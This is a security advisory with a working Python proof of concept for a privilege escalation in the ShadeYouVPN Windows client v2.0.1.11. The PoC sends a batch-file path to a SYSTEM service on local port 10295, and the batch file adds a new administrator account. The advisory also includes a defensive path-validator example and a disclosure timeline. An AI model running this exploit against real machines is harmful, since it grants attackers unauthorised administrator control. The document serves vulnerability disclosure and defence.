14-02-2017 / Vulnerabilities

ShadeYouVPN.com Client v2.0.1.11 for Windows Privilege Escalation

The ShadeYou service runs as a SYSTEM process:

wmic service where name="ShadeYou" get StartName
StartName
LocalSystem

This service executes any file whose path it is given, as SYSTEM, without verifying the path or the file.

All that is required is to send the file path to the service over its local socket (the client connects to 127.0.0.1, TCP port 10295).

Proof of Concept

import socket
import tempfile

print("ShadeYouVPN.com Client v2.0.1.11 for Windows Privilege Escalation")
print("by Kacper Szurek")
print("https://security.szurek.pl/")
print("https://twitter.com/KacperSzurek")

# Write a batch file that adds a local user and puts it in the administrators group.
# NamedTemporaryFile keeps the file on disk (delete=False) so its path can be sent to the service.
t = tempfile.NamedTemporaryFile(mode="w", delete=False, suffix=".bat")
t.write("net user shade /add\n")
t.write("net localgroup administrators shade /add")
t.close()

# The service listens on localhost TCP port 10295 and executes the file named in the
# fourth '|'-separated field of the request as SYSTEM.
s = socket.socket()
s.connect(("127.0.0.1", 10295))
s.send(("s||config|" + t.name + "|ccccc|ddddd|eeee|ffff|\r\n").encode())
print(s.recv(1024))
print(s.recv(1024))
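The check that is missing on the service side, written here as an added example (it is not the vendor's code and not part of the original advisory): a validator for the "s||config|<path>|..." request shape used in the PoC. Only the position of the path (the fourth "|"-separated field) is known from the PoC; the meaning of the other fields, the install directory C:\Program Files\ShadeYouVPN and the ".exe"-only extension allowlist are constructed assumptions. The validator normalises the path with Windows semantics, rejects relative paths, anything that escapes the install directory via ".." or a look-alike directory name, anything on another drive, and any disallowed file type, so a user-writable .bat in %TEMP% would be refused.

```python
import ntpath

# Constructed policy (assumptions, not the product's real layout): the only
# directory the service may launch files from, and the only extension allowed.
ALLOWED_DIR = r"C:\Program Files\ShadeYouVPN"
ALLOWED_EXTENSIONS = {".exe"}


def parse_request(line):
    """Extract the path from a 's||config|<path>|...' request line.

    Only the position of the path (4th '|'-separated field) is known from the
    PoC; the remaining fields' meaning is not, so they are ignored here.
    Returns None if the framing does not match.
    """
    fields = line.rstrip("\r\n").split("|")
    if len(fields) < 4 or fields[0] != "s" or fields[2] != "config":
        return None
    return fields[3]


def is_path_allowed(path, allowed_dir=ALLOWED_DIR, allowed_exts=ALLOWED_EXTENSIONS):
    """True only if `path` is an absolute Windows path that, after
    normalisation, lies inside `allowed_dir` and has an allowed extension.

    ntpath is used explicitly so the check keeps Windows semantics on any host.
    """
    if not path or not ntpath.isabs(path):
        return False  # relative paths would resolve against the service's cwd: deny
    norm = ntpath.normcase(ntpath.normpath(path))
    base = ntpath.normcase(ntpath.normpath(allowed_dir))
    try:
        # commonpath defeats '..' segments and prefix tricks such as
        # 'ShadeYouVPNevil'; paths on different drives raise ValueError.
        if ntpath.commonpath([norm, base]) != base:
            return False
    except ValueError:
        return False
    return ntpath.splitext(norm)[1] in allowed_exts


def check_request(line):
    """Decide whether a request line may be executed; returns (allowed, detail)."""
    path = parse_request(line)
    if path is None:
        return False, "malformed request"
    if not is_path_allowed(path):
        return False, "path outside allowed directory or disallowed type: " + path
    return True, path


if __name__ == "__main__":
    # Constructed sample requests: a user-writable .bat as in the PoC, a '..'
    # escape from the install directory, and a legitimate launch.
    samples = [
        "s||config|C:\\Users\\Public\\AppData\\Local\\Temp\\tmpab12.bat|ccccc|ddddd|eeee|ffff|\r\n",
        "s||config|C:\\Program Files\\ShadeYouVPN\\..\\..\\Users\\Public\\evil.exe|c|d|e|f|\r\n",
        "s||config|C:\\Program Files\\ShadeYouVPN\\openvpn.exe|c|d|e|f|\r\n",
    ]
    for sample in samples:
        print(check_request(sample))
```

A path allowlist alone is not sufficient if the allowed directory is writable by standard users; the directory and the files in it must also be protected by ACLs so that only administrators can change what the SYSTEM service will run.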

Timeline

  • 23-01-2017: Discovered
  • 23-01-2017: Vendor notified
  • 27-01-2017: Version 2.0.1.12 released, issue resolved